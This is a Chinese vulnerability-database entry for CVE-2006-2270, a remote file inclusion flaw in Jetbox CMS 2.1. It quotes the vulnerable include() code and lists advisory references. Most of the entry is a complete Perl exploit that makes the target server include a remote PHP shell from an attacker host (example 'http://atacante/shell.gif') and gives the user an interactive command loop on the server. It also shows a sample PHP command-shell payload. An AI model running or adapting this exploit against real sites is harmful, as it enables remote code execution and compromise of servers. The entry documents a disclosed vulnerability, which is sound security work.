Jetbox CMS config.php 远程文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1110225 漏洞类型 输入验证
发布时间 2006-05-07 更新时间 2007-03-08
CVE编号 CVE-2006-2270 CNNVD-ID CNNVD-200605-132
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/1761
https://www.securityfocus.com/bid/17861
https://cxsecurity.com/issue/WLB-2006050058
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200605-132
|漏洞详情
Jetbox是一款使用php和mysql的内容管理系统。jetbox/includes/phpdig/includes/config.php文件未经声明便使用了include()函数中的relative_script_path变量,允许攻击者包含远程资源的文件,执行任意代码。漏洞代码:if(is_file("$relative_script_path/locales/$phpdig_language-language.php")){include"$relative_script_path/locales/$phpdig_language-language.php";}else{include"$relative_script_path/locales/en-language.php";}
|漏洞EXP
#!/usr/bin/perl
############
# JetBox CMS Remote File Include
# Exploit & Advisorie:  beford <xbefordx gmail com>
#
# uso:# 	perl own.pl <host> <cmd-shell-url> <cmd-var>
# 		perl own.pl http://host.com/jet/ http://atacante/shell.gif cmd
#
# cmd shell example: <? system($cmd); ?>
# cmd variable: cmd;
#
#############
# Description
###########
# Vendor: http://jetbox.streamedge.com/
# The file jetbox/includes/phpdig/includes/config.php uses the variable 
# relative_script_path in a include() function without being declared. 
# This issue has already been fixed in phpdig, but jetbox still uses a 
# vulnerable version.
############
# Vuln code
############
#if (is_file("$relative_script_path/locales/$phpdig_language-language.php"))
#    {include "$relative_script_path/locales/$phpdig_language-language.php";}
#else
#    {include "$relative_script_path/locales/en-language.php";}
############

use LWP::UserAgent;

$Path = $ARGV[0];
$Pathtocmd = $ARGV[1];
$cmdv = $ARGV[2];
if($Path!~/http:\/\// || $Pathtocmd!~/http:\/\// || !$cmdv) { usage(); }
head();
while()
{
	print "[shell] \$";
	while(<STDIN>)      {
		$cmd=$_;
		chomp($cmd);
		if (!$cmd) {last;}  
		$xpl = LWP::UserAgent->new() or die;
		$req = HTTP::Request->new(GET =>$Path.'includes/phpdig/includes/config.php?relative_script_path='.$Pathtocmd.'?&'.$cmdv.'='.$cmd)or die "\nCould Not connect\n";
		$res = $xpl->request($req);
		$return = $res->content;
		$return =~ tr/[\n]/[ê]/;
		
		if ($return =~/Error: HTTP request failed!/ ) {
			print "\nInvalid path for phpshell\n";
			exit;
		} elsif ($return =~/^<br.\/>.<b>Fatal.error/) {
			print "\nComando Invalido, o no hubo respuesta\n\n";
		}
		if ($return =~ /(.*)/) {
			$finreturn = $1;
			$finreturn=~ tr/[ê]/[\n]/;
			print "\r\n$finreturn\n\r";
			last;
		} else {
			print "[shell] \$";
		}

	}

} last;

sub head()  { 
	 print "\n============================================================================\r\n";
	 print " JetBox CMS Remote File Include\r\n";
	 print "============================================================================\r\n";
 }
 
sub usage() {
	 head();
	 print " Usage: perl own.pl <host> <url-cmd> <var>\r\n\n";
	 print " <host> - Full Path : http://host/jetbox/ [remember the trailing slash noob]\r\n";
	 print " <url-cmd> - PhpShell : http://atacate/shell.gif \r\n";
	 print " <var> - var name used in phpshell : cmd  \r\n";
	 exit();
 }

# milw0rm.com [2006-05-07]
|受影响的产品
Jetbox Jetbox CMS 2.1
|参考资料

来源:BID
名称:17861
链接:http://www.securityfocus.com/bid/17861
来源:BUGTRAQ
名称:20060506JetBoxCMSRemoteFileInclude
链接:http://www.securityfocus.com/archive/1/archive/1/433121/100/0/threaded
来源:XF
名称:jetboxcms-phpthumb-file-include(28843)
链接:http://xforce.iss.net/xforce/xfdb/28843
来源:XF
名称:jetboxcms-config-file-include(26289)
链接:http://xforce.iss.net/xforce/xfdb/26289
来源:OSVDB
名称:25313
链接:http://www.osvdb.org/25313
来源:VUPEN
名称:ADV-2006-1686
链接:http://www.frsirt.com/english/advisories/2006/1686
来源:SECTRACK
名称:1016061
链接:http://securitytracker.com/id?1016061
来源:SREASON
名称:861
链接:http://securityreason.com/securityalert/861
来源:SECUNIA
名称:19993
链接:http://secunia.com/advisories/19993